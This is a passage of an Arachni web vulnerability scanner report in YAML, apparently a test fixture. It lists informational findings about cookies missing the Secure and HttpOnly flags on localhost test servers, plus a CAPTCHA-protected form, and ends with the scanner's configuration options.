      :var: cookie
      :element: cookie
      :regexp: ""
    references: 
      SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
    regexp: ""
    regexp_match: 
    remedy_guidance: Set the 'Secure' flag in the cookie.
    response: ""
    severity: Informational
    tags: []

    url: http://localhost:10598/
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: |-
    The logged cookie is allowed to be served over
        an unencrypted channel which makes it susceptible to sniffing.
  elem: cookie
  internal_modname: InsecureCookies
  method: GET
  mod_name: Insecure cookies
  name: Insecure cookie
  references: 
    SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
  remedy_guidance: Set the 'Secure' flag in the cookie.
  severity: Informational
  tags: []

  url: http://localhost:10598/
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: |-
      The logged cookie is allowed to be served over
          an unencrypted channel which makes it susceptible to sniffing.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: 
        - cookie=value
        - cookie2=value2
        - cookie3=value3; secure
        - cookie4=value4; secure
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: InsecureCookies
    method: GET
    mod_name: Insecure cookies
    name: Insecure cookie
    opts: 
      :var: cookie2
      :element: cookie
      :regexp: ""
    references: 
      SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
    regexp: ""
    regexp_match: 
    remedy_guidance: Set the 'Secure' flag in the cookie.
    response: ""
    severity: Informational
    tags: []

    url: http://localhost:10598/
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: |-
    The logged cookie does not have the HttpOnly
        flag set which makes it succeptible to maniplation via client-side code.
  elem: cookie
  internal_modname: HttpOnlyCookies
  method: GET
  mod_name: HttpOnly cookies
  name: HttpOnly cookie
  references: 
    HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
  remedy_guidance: Set the 'HttpOnly' flag in the cookie.
  severity: Informational
  tags: []

  url: http://localhost:11492/
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: |-
      The logged cookie does not have the HttpOnly
          flag set which makes it succeptible to maniplation via client-side code.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: 
        - cookie=value
        - cookie2=value2
        - cookie3=value3; HttpOnly
        - cookie4=value4; HttpOnly
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: HttpOnlyCookies
    method: GET
    mod_name: HttpOnly cookies
    name: HttpOnly cookie
    opts: 
      :var: cookie
      :element: cookie
      :regexp: ""
    references: 
      HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
    regexp: ""
    regexp_match: 
    remedy_guidance: Set the 'HttpOnly' flag in the cookie.
    response: ""
    severity: Informational
    tags: []

    url: http://localhost:11492/
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: |-
    The logged cookie does not have the HttpOnly
        flag set which makes it succeptible to maniplation via client-side code.
  elem: cookie
  internal_modname: HttpOnlyCookies
  method: GET
  mod_name: HttpOnly cookies
  name: HttpOnly cookie
  references: 
    HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
  remedy_guidance: Set the 'HttpOnly' flag in the cookie.
  severity: Informational
  tags: []

  url: http://localhost:11492/
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: |-
      The logged cookie does not have the HttpOnly
          flag set which makes it succeptible to maniplation via client-side code.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: 
        - cookie=value
        - cookie2=value2
        - cookie3=value3; HttpOnly
        - cookie4=value4; HttpOnly
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: HttpOnlyCookies
    method: GET
    mod_name: HttpOnly cookies
    name: HttpOnly cookie
    opts: 
      :var: cookie2
      :element: cookie
      :regexp: ""
    references: 
      HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
    regexp: ""
    regexp_match: 
    remedy_guidance: Set the 'HttpOnly' flag in the cookie.
    response: ""
    severity: Informational
    tags: []

    url: http://localhost:11492/
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: Arachni can't audit CAPTCHA protected forms, consider auditing manually.
  elem: form
  internal_modname: CAPTCHA
  method: GET
  mod_name: CAPTCHA
  name: Found a CAPTCHA protected form.
  references: {}

  severity: Informational
  tags: []

  url: http://localhost:11701/captcha
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: Arachni can't audit CAPTCHA protected forms, consider auditing manually.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "82"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: CAPTCHA
    method: GET
    mod_name: CAPTCHA
    name: Found a CAPTCHA protected form.
    opts: 
      :regexp: (?i-mx:captcha)
      :match: |-
        <form>
                    <input name="CapTcha-32-Some_stuff">
        </form>
      :element: form
    references: {}

    regexp: (?i-mx:captcha)
    regexp_match: |-
      <form>
                  <input name="CapTcha-32-Some_stuff">
      </form>
    response: "        <form>\n            <input name='CapTcha-32-Some_stuff' />\n        </form>\n"
    severity: Informational
    tags: []

    url: http://localhost:11701/captcha
    var: 
    variations: []

    verification: false
  verification: false
options: 
  dir: 
    root: /home/zapotek/workspace/arachni/
    gfx: /home/zapotek/workspace/arachni/gfx/
    conf: /home/zapotek/workspace/arachni/conf/
    logs: /home/zapotek/workspace/arachni/logs/
    data: /home/zapotek/workspace/arachni/data/
    modules: /home/zapotek/workspace/arachni/modules/
    reports: /home/zapotek/workspace/arachni/reports/
    plugins: /home/zapotek/workspace/arachni/plugins/
    rpcd_handlers: /home/zapotek/workspace/arachni/rpcd_handlers/
    path_extractors: /home/zapotek/workspace/arachni/path_extractors/
    lib: /home/zapotek/workspace/arachni/lib/arachni/
    mixins: /home/zapotek/workspace/arachni/lib/arachni/mixins/
    arachni: /home/zapotek/workspace/arachni/lib/arachni
  datastore: {}

  redundant: {}

  obey_robots_txt: false
  fuzz_methods: false
  audit_cookies_extensively: false
  exclude_binaries: false
  auto_redundant: false
  depth_limit: -1
  link_count_limit: -1
  redirect_limit: 20
  lsmod: []

  lsrep: []

  http_req_limit: 20
  mods: []

  reports: {}

  exclude: []

  exclude_cookies: []

  exclude_vectors: []

  include: []

  lsplug: []

  plugins: {}

  rpc_instance_port_range: 
  - 1025
  - 65535
  load_profile: []

  restrict_paths: []

  extend_paths: []

  custom_headers: {}

  min_pages_per_instance: 30
  max_slaves: 10
  url: http://test.com/
  audit_forms: true
  audit_links: true
  audit_cookies: true
  audit_headers: true
  user_agent: Arachni/v1.0dev
plugins: {}

sitemap: []

start_datetime: Fri Oct  5 21:24:43 2012